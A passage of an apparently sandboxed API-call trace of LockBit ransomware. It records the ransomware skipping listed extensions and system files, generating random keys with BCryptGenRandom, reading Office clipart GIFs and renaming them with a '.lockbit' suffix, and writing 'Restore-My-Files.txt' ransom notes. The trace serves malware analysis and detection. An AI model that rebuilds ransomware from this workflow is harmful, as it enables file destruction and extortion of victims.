returned 1 [0101.644] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.644] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.645] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.645] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.645] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.645] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00169_.GIF") returned 1 [0101.645] lstrcmpiW (lpString1="ntldr", lpString2="AG00169_.GIF") returned 1 [0101.645] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00169_.GIF") returned 1 [0101.645] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00169_.GIF") returned 1 [0101.645] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00169_.GIF") returned 1 [0101.645] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00169_.GIF") returned 1 [0101.645] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00169_.GIF") returned 1 [0101.645] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.645] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned=".GIF" [0101.645] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.645] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.645] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.645] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.645] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.645] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.645] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.645] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.645] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.645] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.645] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.646] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.646] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.646] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.646] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.646] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.646] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.646] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.lockbit") returned 72 [0101.646] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xca0 [0101.647] CreateIoCompletionPort (FileHandle=0xca0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.647] malloc (_Size=0x40068) returned 0x3e70078 [0101.647] GetFileSizeEx (in: hFile=0xca0, lpFileSize=0x3e70090 | out: lpFileSize=0x3e70090*=5375) returned 1 [0101.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb00ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb00ac) returned 0x0 [0101.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.651] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb00bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb00bc) returned 0x0 [0101.651] ReadFile (in: hFile=0xca0, lpBuffer=0x3e700ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70078 | out: lpBuffer=0x3e700ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70078) returned 1 [0101.659] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.659] malloc (_Size=0xa6) returned 0x77d800 [0101.659] NtSetInformationFile (FileHandle=0xca0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.659] free (_Block=0x77d800) [0101.659] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.659] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.660] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.660] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76a6b100, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x76a6b100, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x2420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00170_.GIF", cAlternateFileName="")) returned 1 [0101.660] lstrcmpiW (lpString1=".", lpString2="AG00170_.GIF") returned -1 [0101.660] lstrcmpiW (lpString1="..", lpString2="AG00170_.GIF") returned -1 [0101.660] PathFindExtensionW (pszPath="AG00170_.GIF") returned=".GIF" [0101.660] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.660] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.660] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.660] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.660] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.660] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.660] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.660] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.660] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.660] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.660] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.660] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.660] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.660] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.661] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.661] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.661] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.661] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.661] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.661] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.662] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00170_.GIF") returned 1 [0101.662] lstrcmpiW (lpString1="ntldr", lpString2="AG00170_.GIF") returned 1 [0101.662] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00170_.GIF") returned 1 [0101.662] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00170_.GIF") returned 1 [0101.662] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00170_.GIF") returned 1 [0101.662] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00170_.GIF") returned 1 [0101.662] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00170_.GIF") returned 1 [0101.662] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.662] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned=".GIF" [0101.662] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.662] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.663] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.663] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.664] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.664] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.664] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.664] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.lockbit") returned 72 [0101.664] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcac [0101.664] CreateIoCompletionPort (FileHandle=0xcac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.664] malloc (_Size=0x40068) returned 0x3ef0008 [0101.665] GetFileSizeEx (in: hFile=0xcac, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=9248) returned 1 [0101.665] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.667] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0101.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0101.669] ReadFile (in: hFile=0xcac, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.847] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.857] malloc (_Size=0xa6) returned 0x77d800 [0101.858] NtSetInformationFile (FileHandle=0xcac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0101.858] free (_Block=0x77d800) [0101.858] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.858] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.858] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.858] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e1fd00, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x71e1fd00, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x1398, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00171_.GIF", cAlternateFileName="")) returned 1 [0101.858] lstrcmpiW (lpString1=".", lpString2="AG00171_.GIF") returned -1 [0101.858] lstrcmpiW (lpString1="..", lpString2="AG00171_.GIF") returned -1 [0101.858] PathFindExtensionW (pszPath="AG00171_.GIF") returned=".GIF" [0101.858] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.858] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.858] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.858] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.858] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.859] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.859] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.859] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.859] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.859] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.859] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.859] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.859] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.859] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.859] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.859] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.860] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.860] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.860] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.860] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.860] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.860] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.860] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.861] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.861] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.861] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.861] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.861] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00171_.GIF") returned 1 [0101.861] lstrcmpiW (lpString1="ntldr", lpString2="AG00171_.GIF") returned 1 [0101.861] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00171_.GIF") returned 1 [0101.861] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00171_.GIF") returned 1 [0101.861] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00171_.GIF") returned 1 [0101.861] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00171_.GIF") returned 1 [0101.861] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00171_.GIF") returned 1 [0101.861] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.861] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned=".GIF" [0101.861] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.861] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.861] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.861] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.862] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.862] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.862] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.862] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.lockbit") returned 72 [0101.862] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcac [0101.863] CreateIoCompletionPort (FileHandle=0xcac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.863] malloc (_Size=0x40068) returned 0x3d70048 [0101.865] GetFileSizeEx (in: hFile=0xcac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5016) returned 1 [0101.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0101.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0101.867] ReadFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.870] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.870] malloc (_Size=0xa6) returned 0x77d800 [0101.870] 